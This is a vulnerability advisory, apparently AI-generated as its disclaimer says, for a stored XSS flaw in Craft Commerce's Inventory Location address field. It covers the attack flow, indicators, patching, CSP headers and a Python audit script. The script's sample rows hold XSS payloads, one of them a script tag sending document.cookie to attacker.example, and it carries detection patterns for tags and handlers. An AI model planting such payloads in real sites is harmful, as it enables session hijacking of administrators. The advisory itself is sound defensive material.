CVE-2026-25490 Overview
A stored Cross-Site Scripting (XSS) vulnerability has been identified in Craft Commerce, the ecommerce plugin for Craft CMS. An authenticated user with permission to edit Inventory Locations can inject unsanitized input into the 'Address Line 1' field; the payload is stored and later executes as JavaScript in the browser of any administrator who views the affected page in the control panel, inside that administrator's authenticated session.
Critical Impact
Attackers with access to Inventory Location settings can inject persistent malicious scripts that execute in administrator browsers. Because the script runs in the control panel's own origin, it can read CSRF tokens from the page and issue authenticated requests on the victim's behalf regardless of cookie flags, potentially leading to session hijacking, manipulation of administrative actions, or further compromise of the Craft CMS installation.
Affected Products
- Craft Commerce versions 4.0.0-RC1 through 4.10.0
- Craft Commerce versions 5.0.0 through 5.5.1
- Craft CMS installations utilizing vulnerable Craft Commerce versions
Discovery Timeline
- 2026-02-03 - CVE-2026-25490 published to NVD
- 2026-02-04 - Last updated in NVD database
Technical Details for CVE-2026-25490
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) exists due to improper input sanitization in the Craft Commerce admin panel. The 'Address Line 1' field within the Inventory Locations feature fails to properly encode or sanitize user-supplied input before rendering it in the administrative interface. When an attacker with sufficient privileges to edit Inventory Locations enters malicious JavaScript code into this field, the payload is stored in the database and subsequently executed in the browser context of any administrator who views the affected page.
Stored XSS vulnerabilities are particularly dangerous because the malicious payload persists on the server and can affect multiple users over time without requiring social engineering to trick users into clicking malicious links.
Root Cause
The root cause of this vulnerability is insufficient output encoding in the Craft Commerce admin panel templates. The 'Address Line 1' field value is rendered directly into the HTML response without proper escaping or sanitization, allowing JavaScript code embedded in the field to be interpreted as executable content by the browser. This represents a failure in implementing proper output encoding practices when displaying user-controlled data.
Attack Vector
The attack is network-based and requires an attacker to have authenticated access with privileges to modify Inventory Location settings. The attack flow proceeds as follows:
- An attacker with access to the Craft Commerce admin panel navigates to the Inventory Locations configuration
- The attacker enters a malicious JavaScript payload in the 'Address Line 1' field (e.g., <script> tags or event handlers)
- The payload is stored in the application database
- When any administrator subsequently views the Inventory Locations page, the malicious script executes in their browser
- The script then runs with the administrator's session in the control panel's origin: it can read the page (including CSRF tokens) and submit authenticated requests that modify administrative settings or perform other administrative actions, exfiltrate session cookies where they are not flagged HttpOnly, or redirect the victim to a phishing page
Exploitation requires only passive user interaction: an administrator has to view the affected page, but does not have to click anything. For additional technical details, see the GitHub Security Advisory GHSA-wq2m-r96q-crrf.
Detection Methods for CVE-2026-25490
Indicators of Compromise
- Unusual or suspicious content in the 'Address Line 1' field of Inventory Locations containing HTML tags or JavaScript code
- Database rows backing inventory location addresses containing <script>, onerror, onload, javascript: or similar HTML/JavaScript constructs, including entity-encoded variants (&lt;script&gt;) that a plain search for '<' would miss; in Craft 4 and later, addresses are stored as Address elements, so check the addresses table (addressLine1 column) as well as the Commerce inventory location tables
- Administrator session anomalies or unauthorized actions following visits to the Inventory Locations page
- Web application logs showing unusual POST requests to Inventory Location endpoints with encoded script content
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and prevent inline script execution, with reporting enabled
- Deploy Web Application Firewall (WAF) rules to detect XSS payloads in form submissions to administrative endpoints
- Enable audit logging for all changes to Inventory Location records and review for suspicious patterns
- Use browser-based XSS detection tools or security extensions during admin panel usage
Monitoring Recommendations
- Monitor for changes to Inventory Location records, particularly the address fields
- Set up alerts for Content Security Policy violations in your logging infrastructure
- Conduct periodic database audits scanning for potential XSS payloads in user-input fields
- Review administrator session activity for anomalous behavior following admin panel access
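As an added example of the database audit the indicators above and the "audit existing Inventory Location records" steps in the mitigation section call for (this is not Craft CMS or Craft Commerce code): a Python scanner that runs over exported address rows and flags dangerous tags, on* event-handler attributes and javascript:/data: URLs, parsing both the raw value and its entity-decoded form so that an encoded payload is caught too. The rows are constructed; the addresses table and the addressLine1/addressLine2 column names mentioned in the comments are assumptions to check against your own schema, and fetching the rows is left to the caller.

```python
"""Stored-XSS audit of address fields: flags HTML markup, event-handler
attributes and script-scheme URLs in free-text values.

Added example for this advisory, not Craft CMS or Craft Commerce code.
Assumption: records are dicts with an 'id' plus the text fields to check.
Fetching them (e.g. SELECT id, addressLine1, addressLine2 FROM addresses on a
Craft 4+/5 install) is left to the caller; the table and column names are an
assumption to verify against your schema.
"""
import html
import re
from html.parser import HTMLParser

# Tags that have no place in a postal address line.
DANGEROUS_TAGS = {"script", "img", "svg", "iframe", "object", "embed", "link",
                  "style", "meta", "base", "form", "input", "video", "audio", "math"}
# Attributes that take a URL and so can carry a javascript:/data: scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}
SCHEME_RE = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.I)
# Anything that looks like the start of a tag or comment, for a generic "markup" flag.
MARKUP_RE = re.compile(r"</?[a-z!]", re.I)


class _PayloadFinder(HTMLParser):
    """Records dangerous tags, on* handlers and script-scheme URLs as it parses."""

    def __init__(self):
        super().__init__()
        self.findings = set()

    def handle_starttag(self, tag, attrs):  # also reached for <.../> via handle_startendtag
        if tag in DANGEROUS_TAGS:
            self.findings.add(f"tag:{tag}")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.add(f"handler:{name}")
            elif name in URL_ATTRS and value and SCHEME_RE.match(value):
                self.findings.add(f"scheme:{name}")


def find_payloads(text):
    """Return sorted indicator labels found in one field value ([] if clean).

    Both the raw value and its entity-decoded form are parsed: an attacker may
    store '&lt;svg onload=...&gt;' hoping a later decode-then-render turns it
    into live markup, and a search for '<' on the raw column would miss it.
    """
    raw = text or ""
    decoded = html.unescape(raw)
    findings = set()
    for candidate in {raw, decoded}:
        if "<" not in candidate:
            continue  # no tag can start without '<'
        parser = _PayloadFinder()
        parser.feed(candidate)
        parser.close()
        findings |= parser.findings
    if MARKUP_RE.search(decoded):
        findings.add("markup")  # unknown tags still deserve a human look
    return sorted(findings)


def audit_records(records, fields=("addressLine1", "addressLine2")):
    """Scan records; return {record id: {field: [indicators]}} for hits only."""
    hits = {}
    for rec in records:
        for field in fields:
            found = find_payloads(rec.get(field))
            if found:
                hits.setdefault(rec["id"], {})[field] = found
    return hits


# Constructed sample rows (not real data) standing in for a database export.
SAMPLE_RECORDS = [
    {"id": 1, "addressLine1": "123 Main St, Suite 400", "addressLine2": None},
    {"id": 2, "addressLine1": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
     "addressLine2": ""},
    {"id": 3, "addressLine1": '<img src=x onerror="alert(document.domain)">', "addressLine2": None},
    {"id": 4, "addressLine1": "&lt;svg onload=alert(1)&gt;", "addressLine2": None},  # entity-encoded
    {"id": 5, "addressLine1": "Warehouse B <north dock>", "addressLine2": "Bay 2 & 3"},  # benign brackets
    {"id": 6, "addressLine1": "1 Rue de l'Église", "addressLine2": '<a href="javascript:void(0)">map</a>'},
]

if __name__ == "__main__":
    for rec_id, fields in audit_records(SAMPLE_RECORDS).items():
        for field, indicators in fields.items():
            print(f"record {rec_id} {field}: {', '.join(indicators)}")
```

Records 2, 3, 4 and 6 are reported with the specific tag, handler or scheme that makes them a payload; record 5 is reported with only the generic "markup" label, which is the signal to look at it by hand rather than clean it automatically. Run it against a real export rather than just these rows, and treat any non-empty result as a reason to check who last edited that record and when.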
How to Mitigate CVE-2026-25490
Immediate Actions Required
- Upgrade Craft Commerce 4.x installations to version 4.10.1 or later immediately (the Composer package is craftcms/commerce) and apply any pending plugin migrations after the update
- Upgrade Craft Commerce 5.x installations to version 5.5.2 or later immediately (same package) and apply any pending plugin migrations after the update
- Audit existing Inventory Location records for any suspicious or malicious content in address fields
- Review administrator account activity for signs of compromise
Patch Information
Craft CMS has released patched versions that address this stored XSS vulnerability. The fix implements proper output encoding for the 'Address Line 1' field before rendering in the admin panel.
| Affected Version Range | Patched Version |
|---|---|
| 4.0.0-RC1 to 4.10.0 | 4.10.1 |
| 5.0.0 to 5.5.1 | 5.5.2 |
For the fix itself, see the GitHub commit; release notes are available for v4.10.1 and v5.5.2.
Workarounds
- If immediate patching is not possible, restrict access to Inventory Location management to only trusted administrators
- Implement strict Content Security Policy headers to mitigate XSS impact (though this does not fix the underlying vulnerability)
- Manually audit and sanitize any existing Inventory Location address fields for malicious content
- Consider temporarily disabling or limiting access to the Inventory Locations feature until patches can be applied
# Configuration example - Content Security Policy headers in your web server.
# Start with the Report-Only header: a script-src without 'unsafe-inline' blocks the inline
# scripts the Craft control panel relies on, so confirm the control panel still works from the
# reports before switching to the enforcing header. /csp-report is a placeholder for your own
# reporting endpoint (the report-uri directive is widely supported; newer browsers also accept report-to).
# For Apache (.htaccess or httpd.conf):
Header set Content-Security-Policy-Report-Only "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; report-uri /csp-report"
# Once the reports are clean, replace it with the enforcing header:
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; report-uri /csp-report"
# For Nginx (server block in nginx.conf; 'always' keeps the header on error responses too):
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; report-uri /csp-report" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.